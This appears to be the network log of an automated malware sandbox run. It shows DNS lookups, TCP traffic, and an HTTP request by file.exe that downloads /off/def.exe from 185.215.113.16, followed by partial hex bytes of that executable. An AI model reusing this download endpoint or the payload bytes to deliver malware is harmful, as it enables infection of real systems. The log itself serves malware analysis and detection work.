                                                                                                                                                                                        Nov 24, 2024 02:15:05.656955004 CET50016443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.656980038 CET4435001613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.657376051 CET50016443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.657385111 CET4435001613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.887937069 CET4435001513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.891010046 CET4435001513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.891079903 CET50015443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.891133070 CET50015443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.891159058 CET4435001513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.891185045 CET50015443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.891192913 CET4435001513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.894630909 CET50019443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.894675970 CET4435001913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.894747019 CET50019443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.894957066 CET50019443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.894968987 CET4435001913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.935712099 CET4435001413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.938935041 CET4435001413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.939002037 CET50014443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.939048052 CET50014443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.939073086 CET4435001413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.939096928 CET50014443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.939104080 CET4435001413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.942399979 CET50020443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.942434072 CET4435002013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:05.942678928 CET50020443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.942678928 CET50020443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:05.942715883 CET4435002013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:06.099426031 CET4435001613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:06.099543095 CET4435001613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:06.099586964 CET4435001613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:06.099586010 CET50016443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:06.099632025 CET50016443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:06.099875927 CET50016443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:06.099896908 CET4435001613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:06.099910021 CET50016443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:06.099917889 CET4435001613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:06.103043079 CET50021443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:06.103085041 CET4435002113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:06.103178978 CET50021443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:06.103385925 CET50021443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:06.103399992 CET4435002113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.249690056 CET4435001713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.250365019 CET50017443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.250390053 CET4435001713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.250930071 CET50017443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.250936031 CET4435001713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.350219011 CET4435001813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.351125956 CET50018443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.351150036 CET4435001813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.351882935 CET50018443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.351888895 CET4435001813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.685368061 CET4435001713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.688518047 CET4435001713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.688575029 CET50017443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.688946962 CET50017443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.688967943 CET4435001713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.688982964 CET50017443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.688990116 CET4435001713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.692317009 CET50023443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.692363977 CET4435002313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.692418098 CET50023443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.692826033 CET50023443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.692838907 CET4435002313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.783247948 CET4435002013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.783730984 CET50020443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.783762932 CET4435002013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.784204960 CET50020443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.784214020 CET4435002013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.788400888 CET4435002113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.788748980 CET50021443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.788772106 CET4435002113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.789190054 CET50021443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.789194107 CET4435002113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.790786982 CET4435001913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.791047096 CET50019443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.791064024 CET4435001913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.791467905 CET50019443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.791474104 CET4435001913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.794790030 CET4435001813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.797724962 CET4435001813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.797785997 CET50018443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.797799110 CET4435001813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.797827959 CET4435001813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.797877073 CET50018443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.797919989 CET50018443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.797928095 CET4435001813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.797945023 CET50018443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.797950983 CET4435001813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.800646067 CET50024443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.800678015 CET4435002413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:07.800741911 CET50024443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.800923109 CET50024443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:07.800937891 CET4435002413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.232743979 CET4435002013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.235824108 CET4435002013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.235888958 CET4435002013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.235915899 CET50020443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.239435911 CET50020443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.239435911 CET50020443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.239511967 CET50020443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.239530087 CET4435002013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.241136074 CET4435002113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.242083073 CET50025443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.242109060 CET4435002513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.242248058 CET50025443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.243424892 CET50025443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.243434906 CET4435002513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.244242907 CET4435002113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.244795084 CET4435001913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.244869947 CET4435001913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.244885921 CET50021443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.244885921 CET50021443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.244914055 CET50019443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.244921923 CET50021443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.244937897 CET4435002113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.245101929 CET50019443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.245101929 CET50019443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.245117903 CET4435001913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.245131016 CET4435001913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.247368097 CET50026443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.247406006 CET4435002613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.247731924 CET50027443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.247741938 CET4435002713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.247802973 CET50026443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.247972965 CET50027443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.247972965 CET50027443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.248002052 CET4435002713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:15:08.248035908 CET50026443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:15:08.248049974 CET4435002613.107.246.63192.168.2.5
                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Nov 24, 2024 02:13:01.962821960 CET5652753192.168.2.51.1.1.1
                                                                                                                                                                                        Nov 24, 2024 02:13:02.294763088 CET53565271.1.1.1192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:37.834511995 CET53601791.1.1.1192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:37.873368025 CET53647531.1.1.1192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:40.791856050 CET53647971.1.1.1192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:41.985554934 CET5032853192.168.2.51.1.1.1
                                                                                                                                                                                        Nov 24, 2024 02:13:41.985857010 CET6074653192.168.2.51.1.1.1
                                                                                                                                                                                        Nov 24, 2024 02:13:42.122329950 CET53503281.1.1.1192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:42.122850895 CET53607461.1.1.1192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:46.473397970 CET5243153192.168.2.51.1.1.1
                                                                                                                                                                                        Nov 24, 2024 02:13:46.473606110 CET6420053192.168.2.51.1.1.1
                                                                                                                                                                                        Nov 24, 2024 02:13:56.234919071 CET53645791.1.1.1192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:57.873148918 CET53627491.1.1.1192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:58.092372894 CET5826553192.168.2.51.1.1.1
                                                                                                                                                                                        Nov 24, 2024 02:13:58.093614101 CET5636753192.168.2.51.1.1.1
                                                                                                                                                                                        Nov 24, 2024 02:14:16.745171070 CET53534611.1.1.1192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:37.466126919 CET53542531.1.1.1192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:14:39.301915884 CET53575231.1.1.1192.168.2.5
                                                                                                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                        Nov 24, 2024 02:13:46.974417925 CET192.168.2.51.1.1.1c2c2(Port unreachable)Destination Unreachable
                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                        Nov 24, 2024 02:13:01.962821960 CET192.168.2.51.1.1.10xd14aStandard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:41.985554934 CET192.168.2.51.1.1.10xee0dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:41.985857010 CET192.168.2.51.1.1.10x6647Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:46.473397970 CET192.168.2.51.1.1.10xaf4fStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:46.473606110 CET192.168.2.51.1.1.10xacfbStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:58.092372894 CET192.168.2.51.1.1.10x2f1aStandard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:58.093614101 CET192.168.2.51.1.1.10x733bStandard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                        Nov 24, 2024 02:13:02.294763088 CET1.1.1.1192.168.2.50xd14aNo error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:02.294763088 CET1.1.1.1192.168.2.50xd14aNo error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:42.122329950 CET1.1.1.1192.168.2.50xee0dNo error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:42.122850895 CET1.1.1.1192.168.2.50x6647No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:46.611648083 CET1.1.1.1192.168.2.50xaf4fNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:46.611648083 CET1.1.1.1192.168.2.50xaf4fNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:46.611648083 CET1.1.1.1192.168.2.50xaf4fNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:46.611648083 CET1.1.1.1192.168.2.50xaf4fNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:46.907566071 CET1.1.1.1192.168.2.50xc10No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:46.974339008 CET1.1.1.1192.168.2.50xacfbNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:46.974339008 CET1.1.1.1192.168.2.50xacfbNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:47.015647888 CET1.1.1.1192.168.2.50x1e5eNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:47.015647888 CET1.1.1.1192.168.2.50x1e5eNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:47.015647888 CET1.1.1.1192.168.2.50x1e5eNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:49.789514065 CET1.1.1.1192.168.2.50x9e95No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:49.789514065 CET1.1.1.1192.168.2.50x9e95No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:49.789514065 CET1.1.1.1192.168.2.50x9e95No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:49.789794922 CET1.1.1.1192.168.2.50x9eb0No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:58.535377979 CET1.1.1.1192.168.2.50x2f1aNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Nov 24, 2024 02:13:58.555165052 CET1.1.1.1192.168.2.50x733bNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        • property-imper.sbs
                                                                                                                                                                                        • slscr.update.microsoft.com
                                                                                                                                                                                        • otelrules.azureedge.net
                                                                                                                                                                                        • fs.microsoft.com
                                                                                                                                                                                        • https:
                                                                                                                                                                                          • js.monitor.azure.com
                                                                                                                                                                                          • wcpstatic.microsoft.com
                                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        0192.168.2.549729185.215.113.16806088C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Nov 24, 2024 02:13:24.319801092 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Host: 185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:25.753722906 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:25 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 2832384
                                                                                                                                                                                        Last-Modified: Sun, 24 Nov 2024 00:56:48 GMT
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        ETag: "674279d0-2b3800"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2b 00 00 04 00 00 1a da 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                        Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ ++`Ui` @ @.rsrc`2@.idata 8@rqwfzwob**:@llcfprjm ++@.taggant@+"+@
                                                                                                                                                                                        Nov 24, 2024 02:13:25.753891945 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Nov 24, 2024 02:13:25.753901958 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Nov 24, 2024 02:13:25.753911972 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Nov 24, 2024 02:13:25.753921986 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Nov 24, 2024 02:13:25.753931999 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Nov 24, 2024 02:13:25.753942013 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Nov 24, 2024 02:13:25.753952026 CET1236INData Raw: d3 e5 54 a3 ab 42 56 68 34 31 54 e0 24 67 b1 92 d0 7e bb 82 91 1c a8 42 60 f7 89 61 fa 7c 1a 78 8c 69 00 07 f6 5a db c2 dc b2 91 98 05 20 46 63 41 f8 75 92 7d eb 48 5e 33 1a 53 5c 43 f0 0c 75 45 e3 65 a2 ab ee 61 ba 8f 07 75 58 21 01 53 f3 6d ca
                                                                                                                                                                                        Data Ascii: TBVh41T$g~B`a|xiZ FcAu}H^3S\CuEeauX!SmcLb5HduB~,Jd7eqH[f:gs!QJ%x^<m_*I0m7b%dj/];otF[+n?kR#p%|Mq1@oF\\_:4jB[W w\~u w_
                                                                                                                                                                                        Nov 24, 2024 02:13:25.753961086 CET1236INData Raw: bf e6 6b b8 e7 e6 6f 84 d0 d1 f4 98 2a 09 6a 11 72 11 66 9c a3 1c 88 81 61 6e 90 a8 47 29 60 a3 71 11 a0 82 d3 49 a4 a5 d8 dc e1 20 48 e6 ab a2 71 45 6c d0 a3 2d bc 96 95 82 c6 dc 6f 09 c8 79 a1 0a 00 fd 2a 65 59 2a 48 69 78 a3 b1 fa df f0 b9 a1
                                                                                                                                                                                        Data Ascii: ko*jrfanG)`qI HqEl-oy*eY*Hixy9Bz 7_,:@U0"nU8r$I((X\+[0be8Y?s^nbKQU{?U!zy/4f$eiM)y6R+gtGIOdacN6Tc`
                                                                                                                                                                                        Nov 24, 2024 02:13:25.753972054 CET1236INData Raw: 88 03 65 a9 9d 21 6c 75 84 4e 1c a3 3c cd 5b 17 37 dc 6d d0 77 f6 8f 49 2c 3f 9b c1 96 c1 c1 46 8e 0e 9a d3 35 62 8e 67 c2 40 41 76 51 fb a0 39 82 e9 bf b2 27 4c dd c4 41 d9 c9 c4 92 3c bc fd b9 f6 b7 91 43 40 b0 ab 38 b3 00 a4 af 96 85 f4 f4 cf
                                                                                                                                                                                        Data Ascii: e!luN<[7mwI,?F5bg@AvQ9'LA<C@8 `r8SZep;Qn(?LkIJ@s\K@Y{1oI_dvm7fY7@nW1(n4LspyY)qjR7FqCh6
                                                                                                                                                                                        Nov 24, 2024 02:13:25.873677969 CET1236INData Raw: 30 2e 35 4d 5a fd 4a 7c 55 81 51 67 0e dd 8d 83 25 f6 59 e3 25 fd ab 70 22 13 38 c9 28 ee 36 94 25 ed b1 ae 72 fa fd 35 a5 c2 47 da 86 ac 69 11 71 a7 c4 a7 88 4b 74 60 71 db 5d b7 8f 3a b8 ae 1f 48 b6 a5 95 3c ad 51 f2 06 57 33 e2 50 bb e5 91 c1
